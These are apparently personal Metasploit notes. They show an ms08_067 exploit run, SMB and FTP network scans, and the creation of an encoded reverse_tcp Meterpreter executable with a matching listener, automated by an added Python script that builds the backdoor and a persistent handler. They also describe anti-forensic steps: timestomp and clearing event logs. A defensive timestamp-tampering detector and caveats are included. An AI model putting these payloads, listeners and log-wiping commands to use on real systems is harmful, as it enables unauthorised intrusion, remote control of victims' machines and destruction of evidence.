msfconsole example
http://www.nsfocus.net/index.php?act=alert (vulnerability list)
http://blog.csdn.net/chence19871/article/details/7415859 (security tools)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.102
RHOST => 192.168.0.102
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.101:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability...
smb_version scan: quickly enumerates the Windows hosts on a subnet (unauthenticated SMB probe; the OS string, hostname and domain come from the server's own SMB negotiation, so treat them as self-reported)
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > ifconfig | grep inet
[*] exec: ifconfig | grep inet

          inet addr:10.2.3.80  Bcast:10.2.3.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed2:209e/64 Scope:Link
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
msf auxiliary(smb_version) > set RHOSTS 10.2.3.80/24
RHOSTS => 10.2.3.80/24
msf auxiliary(smb_version) > set THREADS 5
THREADS => 5
msf auxiliary(smb_version) > run
[*] 10.2.3.4:445 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:JT-SERVER) (domain:WORKGROUP)
[*] 10.2.3.2:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:JB-PC) (domain:WORKGROUP)
[*] 10.2.3.14:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:***-PC) (domain:WORKGROUP)
ftp_version scan: probes only the FTP service and records the banner (the banner is printed as an escaped string, so \x0d\x0a is the CRLF between banner lines)
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 10.1.2.58/24
RHOSTS => 10.1.2.58/24
msf auxiliary(ftp_version) > run
[*] 10.1.2.1:21 FTP Banner: '220-Welcome to Pure-FTPd.\x0d\x0a220-You are user number 1 of 5 allowed.\x0d\x0a220-Local time is now 08:44. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
[*] 10.1.2.11:21 FTP Banner: '220-FileZilla Server version 0.9.40 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[*] 10.1.2.14:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[*] Scanned 026 of 256 hosts (010% complete)
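The two scanner runs above print one line per host. To turn them into an inventory, parse the lines instead of reading them by eye. This is an added example, not part of the original notes and not Metasploit code: the sample lines are copied from the scan output above, the regexes are written against that output format (older msf versions print "7601 Service Pack (Build 1)" for an SP1 host, which the parser handles), and the Windows 7 build rule (7600 = RTM, 7601 = SP1) and the FTP product heuristics are this example's own.

```python
import re
from dataclasses import dataclass, field

# Lines in the shape the smb_version and ftp_version scanners above print them.
SMB_RE = re.compile(
    r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) is running (?P<os>.+?) "
    r"\(language: (?P<lang>[^)]*)\) \(name:(?P<name>[^)]*)\) \(domain:(?P<domain>[^)]*)\)$"
)
FTP_RE = re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) FTP Banner: '(?P<banner>.*)'$")
# Product strings seen in the banners above; anything else falls back to the first banner line.
FTP_PRODUCT_RE = re.compile(r"(Pure-FTPd|FileZilla Server version [\d.]+(?: beta)?|vsFTPd [\d.]+)")

# Sample input: copied from the scan output on this page (the progress line is noise to skip).
SAMPLE = r"""[*] 10.2.3.4:445 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:JT-SERVER) (domain:WORKGROUP)
[*] 10.2.3.2:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:JB-PC) (domain:WORKGROUP)
[*] 10.1.2.1:21 FTP Banner: '220-Welcome to Pure-FTPd.\x0d\x0a220-You are user number 1 of 5 allowed.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a'
[*] 10.1.2.11:21 FTP Banner: '220-FileZilla Server version 0.9.40 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a'
[*] 10.1.2.14:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[*] Scanned 026 of 256 hosts (010% complete)
"""


@dataclass
class Service:
    host: str
    port: int
    kind: str           # "smb" or "ftp"
    product: str        # OS string for SMB, server product for FTP
    detail: dict = field(default_factory=dict)


def unescape_banner(raw):
    """Turn the \\x0d\\x0a escapes msf prints back into real CR/LF characters."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), raw)


def parse_smb(line):
    m = SMB_RE.match(line.strip())
    if not m:
        return None
    # The real build number is the first 4- or 5-digit number in the OS string; this also
    # copes with "Windows 7 Ultimate 7601 Service Pack (Build 1)" printed for SP1 hosts.
    build = re.search(r"\b(\d{4,5})\b", m["os"])
    return Service(m["host"], int(m["port"]), "smb", m["os"], {
        "name": m["name"], "domain": m["domain"],
        "build": int(build.group(1)) if build else None,
    })


def parse_ftp(line):
    m = FTP_RE.match(line.strip())
    if not m:
        return None
    banner = unescape_banner(m["banner"])
    lines = banner.splitlines()
    prod = FTP_PRODUCT_RE.search(banner)
    first = re.sub(r"^\d{3}[- ]", "", lines[0]).strip() if lines else ""
    return Service(m["host"], int(m["port"]), "ftp", prod.group(1) if prod else first or "unknown", {
        # The banner is the only evidence here: "unknown" means it said nothing either way.
        "anonymous": "denied" if "No anonymous login" in banner else "unknown",
        "banner_lines": len(lines),
    })


def parse_scan(text):
    """Inventory of every host line msf printed; progress and other lines are ignored."""
    out = []
    for line in text.splitlines():
        svc = parse_smb(line) or parse_ftp(line)
        if svc:
            out.append(svc)
    return out


def findings(services):
    """Example rule: Windows 7 build 7600 is RTM, i.e. SP1 (build 7601) was never applied."""
    return [f"{s.host}: Windows 7 build 7600 is RTM, SP1 (build 7601) not installed"
            for s in services
            if s.kind == "smb" and s.product.startswith("Windows 7") and s.detail["build"] == 7600]


if __name__ == "__main__":
    inventory = parse_scan(SAMPLE)
    for s in inventory:
        print(f"{s.host}:{s.port} {s.kind} {s.product} {s.detail}")
    for note in findings(inventory):
        print("FINDING", note)
```

Feed it the console transcript (`msfconsole` output saved with `spool`, or copy-pasted) and extend `findings` with whatever rules the engagement needs; the point is that the build number and the banner are already structured data once parsed.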
Attacking a Windows host: steps
Step 1. Use msfpayload to generate a reverse_tcp payload (msfpayload and msfencode were removed from the framework in 2015; msfvenom does both jobs in one command now)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=31336 R | msfencode -t exe -x /root/a.exe -o /tmp/back.exe -e x86/shikata_ga_nai -c 5
Step 2. Start a listener in msfconsole with exploit/multi/handler, copy back.exe to the Windows host and run it; the stage is sent when the reverse connection arrives
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.111
lhost => 192.168.0.111
msf exploit(handler) > set lport 31336
lport => 31336
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.111:31336
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.111:31336 -> 192.168.0.119:1070) at 2013-03-17 22:24:56 +0800
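The two steps above, driven from one script: the payload is built with msfvenom (the tool that replaced the msfpayload | msfencode pipeline) and the handler session is written out as a resource script so it is replayed identically every time. This is an added example, not from the original notes or from the Metasploit project; the template path, output path, LHOST and LPORT are the values from the notes and are assumptions for your own setup, and /tmp/handler.rc is a name chosen here.

```python
import ipaddress
import shutil
import subprocess
from pathlib import Path


def msfvenom_argv(lhost, lport, template, out,
                  payload="windows/meterpreter/reverse_tcp",
                  encoder="x86/shikata_ga_nai", iterations=5):
    """Argument list equivalent to the msfpayload | msfencode command in Step 1."""
    ipaddress.IPv4Address(lhost)            # a typo here means no session ever calls back
    if not 1 <= int(lport) <= 65535:
        raise ValueError(f"LPORT out of range: {lport}")
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-e", encoder, "-i", str(iterations),   # -i: encoder iterations (msfencode -c)
            "-x", str(template),                    # -x: existing exe used as template (msfencode -x)
            "-f", "exe", "-o", str(out)]


def handler_rc(lhost, lport, payload="windows/meterpreter/reverse_tcp"):
    """Resource script (msfconsole -r file.rc) that replays the handler session in Step 2."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",   # keep listening after the first session comes in
        "exploit -j -z",             # run as a background job and do not auto-interact
    ]) + "\n"


def main(lhost="192.168.0.111", lport=31336, template="/root/a.exe", out="/tmp/back.exe"):
    rc_path = Path("/tmp/handler.rc")               # assumed location for the resource script
    rc_path.write_text(handler_rc(lhost, lport))
    argv = msfvenom_argv(lhost, lport, template, out)
    if shutil.which("msfvenom"):
        subprocess.run(argv, check=True)
    else:
        print("msfvenom not found; would run:", " ".join(argv))
    print(f"start the listener with: msfconsole -q -r {rc_path}")


if __name__ == "__main__":
    main()
```

ExitOnSession false plus -j -z is what makes the listener survive the first callback, so several hosts running back.exe all land as separate sessions instead of the second one finding nobody listening.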
Database notes: recent versions no longer support MySQL or SQLite, PostgreSQL is the only backend
msf auxiliary(smb_version) > db_driver
[-] The db_driver command is DEPRECATED

Because Metasploit no longer supports databases other than the default
PostgreSQL, there is no longer a need to set the driver. Thus db_driver
is not useful and its functionality has been removed. Usually Metasploit
will already have connected to the database; check db_status to see.
[*] postgresql connected to msf3dev
msf auxiliary(smb_version) > db_status
[*] postgresql connected to msf3dev
Covering tracks: commands used inside a meterpreter session
1. timestomp
In meterpreter: timestomp -b filename blanks the file's MACE timestamps (so a forensic tool such as EnCase shows empty values); timestomp -v filename displays them, -z sets all four to a given time, and -f copies them from another file. Caveat: this only rewrites the $STANDARD_INFORMATION timestamps; the $FILE_NAME timestamps in the same MFT record are left alone, and an analyst who compares the two sees the mismatch.
2. run event_manager
run event_manager -c clears the Windows event logs (run event_manager -i lists them; the built-in clearev command does the same clearing). Caveat: on Vista and later, clearing a log is itself recorded (Security event 1102, System event 104), and any events already forwarded to a collector or SIEM are not touched.
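The caveat above is what a defender checks for: $FILE_NAME timestamps cannot be set through the file API, so a $STANDARD_INFORMATION creation time earlier than the $FILE_NAME creation time, or SI times that all sit on whole seconds (timestomp -z takes a second-precision value), or SI times blanked to an all-zero FILETIME, each points at tampering. This is an added example, not part of the original notes or of Metasploit; the records are constructed to look like an MFT parser's export (field names are this example's own), and the assumption that a "blank" timestamp shows up as FILETIME zero (1601-01-01) is one common form, not the exact value every tool writes.

```python
from datetime import datetime, timezone

FILETIME_ZERO = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed records in the shape an MFT parser exports: si_* = $STANDARD_INFORMATION,
# fn_created = $FILE_NAME creation time. All values are made up for this example.
RECORDS = [
    {"path": r"C:\Windows\System32\calc.exe",          # untouched system file
     "si_created": "2009-07-14T01:39:12.1234567Z", "si_modified": "2009-07-14T01:39:12.1234567Z",
     "fn_created": "2009-07-14T01:39:12.1234567Z"},
    {"path": r"C:\Users\jb\back.exe",                  # timestomp -z: whole seconds, SI before FN
     "si_created": "2009-01-01T00:00:00.0000000Z", "si_modified": "2009-01-01T00:00:00.0000000Z",
     "fn_created": "2013-03-17T14:24:50.4219876Z"},
    {"path": r"C:\Users\jb\notes.txt",                 # blanked SI timestamps
     "si_created": "1601-01-01T00:00:00.0000000Z", "si_modified": "1601-01-01T00:00:00.0000000Z",
     "fn_created": "2013-03-10T09:15:01.2345678Z"},
    {"path": r"C:\Users\jb\report.docx",               # copied from FAT media: only mtime is coarse
     "si_created": "2013-03-12T10:00:00.5000000Z", "si_modified": "2011-05-05T12:00:00.0000000Z",
     "fn_created": "2013-03-12T10:00:00.5000000Z"},
]


def parse_ts(s):
    """'YYYY-MM-DDTHH:MM:SS.fffffffZ' -> (datetime to the second, 100 ns ticks as FILETIME stores)."""
    base, _, frac = s.rstrip("Z").partition(".")
    dt = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
    ticks = int((frac + "0000000")[:7]) if frac else 0
    return dt, ticks


def indicators(rec):
    """Tampering indicators for one record; an empty list means nothing stood out."""
    si = {k: parse_ts(v) for k, v in rec.items() if k.startswith("si_")}
    fn_created, _ = parse_ts(rec["fn_created"])
    if all(dt == FILETIME_ZERO for dt, _ in si.values()):
        return ["SI timestamps blanked to FILETIME zero"]
    hits = []
    # $FILE_NAME is written by the kernel when the record is created and is not reachable through
    # SetFileTime, so SI created before FN created is a strong (not absolute: some archivers restore
    # creation times) indicator.
    if si["si_created"][0] < fn_created:
        hits.append("SI created earlier than FN created")
    # Every SI time on an exact second is the signature of a tool that took a second-precision
    # value; a single coarse mtime (FAT copies) is normal and deliberately not flagged.
    if all(ticks == 0 for _, ticks in si.values()):
        hits.append("all SI timestamps on whole seconds")
    return hits


def scan(records):
    """Map path -> indicators for the records that have at least one."""
    return {r["path"]: hits for r in records if (hits := indicators(r))}


if __name__ == "__main__":
    for path, hits in scan(RECORDS).items():
        print(path, "->", "; ".join(hits))
```

Run it over the SI/FN columns of a real MFT export; the whole-second rule in particular is cheap and catches exactly the kind of timestomp usage the notes above describe.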